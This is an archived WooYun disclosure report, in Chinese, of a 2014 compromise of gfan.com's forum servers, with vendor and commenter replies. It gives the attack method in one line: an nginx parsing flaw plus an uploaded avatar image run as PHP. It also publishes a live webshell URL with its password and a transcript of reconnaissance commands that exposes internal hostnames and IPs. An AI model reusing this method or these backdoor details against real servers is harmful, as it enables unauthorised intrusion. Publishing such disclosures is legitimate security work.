机锋网多处运维安全隐患导致可上传后门文件一功能性服务器数据安全（getshell）

2015年8月15日10:14:06评论241 views字数 267阅读0分53秒阅读模式

摘要

2014-11-19：细节已通知厂商并且等待厂商处理中
2014-11-19：厂商已经确认，细节仅向厂商公开
2014-11-29：细节向核心白帽子及相关领域专家公开
2014-12-09：细节向普通白帽子公开
2014-12-19：细节向实习白帽子公开
2015-01-03：细节向公众公开

漏洞概要关注数(7) 关注此漏洞

缺陷编号： WooYun-2014-83803

漏洞标题：机锋网多处运维安全隐患导致可上传后门文件一功能性服务器数据安全（getshell）

漏洞作者：我了个去

提交时间： 2014-11-19 10:43

公开时间： 2015-01-03 10:44

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：安全意识不足默认配置不当 nginx解析漏洞 webserver服务配置不当安全意识不足

2人收藏

漏洞详情

披露状态：

简要描述：

机锋网早已getshell

详细说明：

用户2700W+ 我会乱说嘛

过程较简单，不详细了，nginx解析，注册用户，上传头像临时图片位置/.php getshell

漏洞证明：

由于gfan的业务都是公用的一个存储 nfs共享，而且都对磁盘有写权限，所以直接可以拿到论坛shell

一句话地址：http://bbs.gfan.com/data/diy/diy_core.php 密码：wen 不要和我说漏洞已经重复或修补了，此shell证明一切。

code 区域

[/data/bbs/program/data/diy/]$ whoami
 www-data
 [/data/bbs/program/data/diy/]$ hostname
 php84
 [/data/bbs/program/data/diy/]$ cat /etc/hosts
 119.254.88.62 sdk2.entinfo.cn
 ::1     ip6-localhost ip6-loopback
 fe00::0 ip6-localnet
 ff00::0 ip6-mcastprefix
 ff02::1 ip6-allnodes
 ff02::2 ip6-allrouters
 10.8.8.167 api.gfan.com
 10.8.8.135 bbs.gfan.com
 117.79.144.130 smtp.gfanstore.com
 10.8.8.169 source.mappn.com
 
 127.0.0.1       localhost
 112.90.83.87    openapi.qzone.qq.com
 221.194.129.52    freeapi.hylanda.com
 112.253.37.235 download006.rdb.cnc.ccgslb.net
 91.189.91.14   us.archive.ubuntu.com
 [/data/bbs/program/data/diy/]$ ifconfig -a
 eth0      Link encap:Ethernet  HWaddr 14:fe:b5:d8:39:0f  
           inet addr:10.8.8.84  Bcast:10.8.8.255  Mask:255.255.255.0
           inet6 addr: fe80::16fe:b5ff:fed8:390f/64 Scope:Link
           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
           RX packets:11045431082 errors:0 dropped:0 overruns:0 frame:0
           TX packets:9275138430 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:8868587006755 (8.0 TiB)  TX bytes:3115610595957 (2.8 TiB)
           Interrupt:36 Memory:d6000000-d6012800 
 
 eth1      Link encap:Ethernet  HWaddr 14:fe:b5:d8:39:11  
           BROADCAST MULTICAST  MTU:1500  Metric:1
           RX packets:0 errors:0 dropped:0 overruns:0 frame:0
           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
           Interrupt:48 Memory:d8000000-d8012800 
 
 eth2      Link encap:Ethernet  HWaddr 14:fe:b5:d8:39:13  
           BROADCAST MULTICAST  MTU:1500  Metric:1
           RX packets:0 errors:0 dropped:0 overruns:0 frame:0
           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
           Interrupt:32 Memory:da000000-da012800 
 
 eth3      Link encap:Ethernet  HWaddr 14:fe:b5:d8:39:15  
           BROADCAST MULTICAST  MTU:1500  Metric:1
           RX packets:0 errors:0 dropped:0 overruns:0 frame:0
           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
           Interrupt:42 Memory:dc000000-dc012800 
 
 lo        Link encap:Local Loopback  
           inet addr:127.0.0.1  Mask:255.0.0.0
           inet6 addr: ::1/128 Scope:Host
           UP LOOPBACK RUNNING  MTU:16436  Metric:1
           RX packets:53635 errors:0 dropped:0 overruns:0 frame:0
           TX packets:53635 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:0 
           RX bytes:12029502 (11.4 MiB)  TX bytes:12029502 (11.4 MiB)
 [/data/bbs/program/data/diy/]$ uname -a
 Linux php84 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 GNU/Linux
 [/data/bbs/program/data/diy/]$

修复方案：

修改nginx配置文件，或者升级nginx版本

版权声明：转载请注明来源我了个去@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2014-11-19 12:07

厂商回复：

已在修复中，请问nginx哪些指令配置不当。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-11-19 10:48 | 我了个去 ( 普通白帽子 | Rank:139 漏洞数:14 )

1

发的仓促，多谢管理帮忙整理格式。

1# 回复此人
2014-11-19 11:01 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

1

@我了个去那么着急

2# 回复此人
2014-11-19 11:06 | 我了个去 ( 普通白帽子 | Rank:139 漏洞数:14 )

1

@疯狗

3# 回复此人
2014-11-19 13:06 | 我了个去 ( 普通白帽子 | Rank:139 漏洞数:14 )

1

刚看了下，nginx解析和nfs共享的问题已经处理了，前一两个月前还存在，不过shell你没有删除干净，仔细检查下吧，至少还有两个，如果找不到加我扣扣四八九二零五七详谈

4# 回复此人
2014-11-19 18:45 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

1

@我了个去惊呆

5# 回复此人
2014-11-21 11:54 | 机锋网(乌云厂商)

1

@我了个去已经处理，谢谢。

6# 回复此人

漏洞概要 关注数(7) 关注此漏洞

缺陷编号： WooYun-2014-83803

漏洞标题： 机锋网多处运维安全隐患导致可上传后门文件一功能性服务器数据安全（getshell）

相关厂商： 机锋网

漏洞作者： 我了个去

提交时间： 2014-11-19 10:43

公开时间： 2015-01-03 10:44

漏洞类型： 系统/服务运维配置不当

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 安全意识不足 默认配置不当 nginx解析漏洞 webserver服务配置不当 安全意识不足

2人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 我了个去@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(7) 关注此漏洞

漏洞标题：机锋网多处运维安全隐患导致可上传后门文件一功能性服务器数据安全（getshell）

相关厂商：机锋网

漏洞作者：我了个去

漏洞类型：系统/服务运维配置不当

危害等级：高

漏洞状态：厂商已经确认

Tags标签：安全意识不足默认配置不当 nginx解析漏洞 webserver服务配置不当安全意识不足

版权声明：转载请注明来源我了个去@乌云

漏洞评价(共0人评价):

登陆后才能进行评分